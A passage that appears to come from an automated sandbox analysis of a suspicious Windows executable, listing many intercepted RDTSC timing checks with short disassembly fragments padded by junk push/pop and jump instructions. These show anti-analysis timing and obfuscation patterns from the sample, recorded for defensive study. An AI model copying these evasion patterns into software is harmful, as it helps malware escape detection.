                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324ABA second address: 1324AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC40050481Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FC400504833h 0x0000000f jmp 00007FC400504827h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324C0F second address: 1324C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC400D80DA6h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jp 00007FC400D80DA6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324C23 second address: 1324C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FC40050481Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1325036 second address: 1325040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC400D80DA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1325040 second address: 1325068 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC400504816h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC400504828h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1325068 second address: 132506C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A010 second address: 132A014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A014 second address: 132A01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A1C3 second address: 132A1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC400504816h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC400504828h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A62A second address: 132A62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A62E second address: 132A634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A634 second address: 132A63E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133187C second address: 133189B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC400504824h 0x00000008 jc 00007FC400504816h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13313E2 second address: 13313E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13313E6 second address: 1331408 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC400504816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FC400504823h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13340F8 second address: 1334105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133AB41 second address: 133AB64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC40050481Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jl 00007FC400504816h 0x00000014 js 00007FC400504816h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339A3A second address: 1339A4D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC400D80DA6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339A4D second address: 1339A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339BA3 second address: 1339BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1339BAB second address: 1339BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007FC400504816h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1339BB6 second address: 1339BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC400D80DABh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12EA42C second address: 12EA430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12EA430 second address: 12EA436 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12EA436 second address: 12EA4B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400504828h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jne 00007FC400504818h 0x00000011 pop esi 0x00000012 nop 0x00000013 call 00007FC400504828h 0x00000018 mov dx, ECA9h 0x0000001c pop ecx 0x0000001d mov ebx, dword ptr [ebp+1248F604h] 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007FC400504818h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 00000015h 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d cmc 0x0000003e add eax, ebx 0x00000040 js 00007FC40050481Ch 0x00000046 mov dword ptr [ebp+122D2779h], ebx 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push ebx 0x00000051 pop ebx 0x00000052 pop eax 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1339CF2 second address: 1339CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC400D80DA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1339E54 second address: 1339E58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1339E58 second address: 1339E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FC400D80DAAh 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1339E6A second address: 1339E7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FC400504816h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1339E7F second address: 1339E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1339E85 second address: 1339E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1339E90 second address: 1339E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1339E94 second address: 1339E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133E715 second address: 133E71B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133DE1A second address: 133DE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400504825h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133DE37 second address: 133DE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400D80DAAh 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FC400D80DA6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134246A second address: 1342475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1342475 second address: 1342479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1342479 second address: 134247D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134247D second address: 134248D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FC400D80DAEh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1341755 second address: 1341768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC40050481Ch 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1341A99 second address: 1341A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1341C02 second address: 1341C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1341D32 second address: 1341D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1341EA6 second address: 1341EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 jo 00007FC400504816h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13481C4 second address: 13481DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC400D80DB1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134834E second address: 1348366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FC400504818h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1348366 second address: 1348387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC400D80DADh 0x00000009 jmp 00007FC400D80DB0h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1348759 second address: 1348765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC400504816h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1348765 second address: 134876D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134876D second address: 1348783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC40050481Bh 0x00000009 jo 00007FC400504816h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1348D72 second address: 1348D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1348D76 second address: 1348D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400504823h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC40050481Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1348D9C second address: 1348DA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1348DA0 second address: 1348DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1349363 second address: 134937E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FC400D80DAFh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1349BE8 second address: 1349C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400504825h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FC40050481Bh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1349ECA second address: 1349ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1349ED0 second address: 1349ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134CFA2 second address: 134CFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134CFA8 second address: 134CFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC400504816h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134D57B second address: 134D586 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134D586 second address: 134D5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400504825h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134D952 second address: 134D9AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC400D80DB6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FC400D80DB8h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push edx 0x00000017 pop edx 0x00000018 jmp 00007FC400D80DB4h 0x0000001d popad 0x0000001e pushad 0x0000001f jp 00007FC400D80DA6h 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13524AF second address: 13524C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 je 00007FC400504816h 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FC40050481Ah 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13524C9 second address: 13524FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC400D80DB7h 0x00000009 jmp 00007FC400D80DB9h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13580FC second address: 1358103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1358103 second address: 135810B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13583C3 second address: 13583C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13583C7 second address: 13583EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400D80DB1h 0x00000007 jmp 00007FC400D80DB3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1358763 second address: 1358767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1358767 second address: 135876D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13588B3 second address: 13588B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13588B9 second address: 13588BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13588BD second address: 13588C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13588C1 second address: 13588D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FC400D80DACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13588D3 second address: 13588D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1359C91 second address: 1359C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1359C95 second address: 1359CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC400504816h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FC40050481Fh 0x00000012 jno 00007FC400504816h 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1359CB8 second address: 1359CDF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007FC400D80DA6h 0x00000009 pop esi 0x0000000a jmp 00007FC400D80DB2h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ebx 0x00000012 jc 00007FC400D80DACh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13579E0 second address: 13579E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13579E4 second address: 13579EA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13579EA second address: 13579F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13579F0 second address: 13579F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13579F6 second address: 13579FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13579FC second address: 1357A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1357A00 second address: 1357A1C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC400504816h 0x00000008 js 00007FC400504816h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 pushad 0x00000014 jns 00007FC400504816h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1357A1C second address: 1357A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC400D80DA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC400D80DB8h 0x00000012 jmp 00007FC400D80DB0h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 135F290 second address: 135F2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC400504824h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 135F2AA second address: 135F2AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13653E3 second address: 13653ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC400504816h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A61BB second address: 12A61BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1372163 second address: 1372169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1372169 second address: 137216D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137216D second address: 1372173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1376A8D second address: 1376A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1376A95 second address: 1376ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400504823h 0x00000009 jmp 00007FC400504822h 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC400504827h 0x00000018 rdtsc
